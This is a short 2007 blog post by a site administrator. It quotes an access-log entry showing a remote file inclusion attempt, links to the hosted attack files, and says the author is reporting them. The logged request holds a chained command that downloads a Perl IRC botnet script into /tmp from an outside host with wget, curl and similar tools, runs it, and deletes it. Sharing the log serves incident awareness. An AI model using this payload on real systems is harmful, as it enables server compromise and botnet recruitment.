Wednesday, July 11, 2007

grep cmd access.log
Today i was inspecting the logs

189.23.39.114 - - [11/Jul/2007:03:20:43 -0400] "GET /fooo.php?fooo=http://www.freewebs.com/cuza0/tool25.dat?&cmd=cd%20/tmp;rm%20-rf%20botnet*;wget%20http://www.freewebs.com/nkparceria/botnet.txt;lwp-download%20http://www.freewebs.com/nkparceria/botnet.txt;fetch%20http://www.freewebs.com/nkparceria/botnet.txt;curl%20-o%20botnet.txt%20http://www.freewebs.com/nkparceria/botnet.txt;GET%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;lynx%20-source%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;perl%20botnet.txt;rm%20-rf%20botnet.txt* HTTP/1.1" 200 4812 "-" "Mozilla/3.0 (compatible; Indy Library)"

you can see the php code here
http://www.freewebs.com/cuza0/tool25.dat
and irc perl bot is here
http://www.freewebs.com/nkparceria/botnet.txt

Now i inform the freewebs about this hosting of the evil scripts

No comments: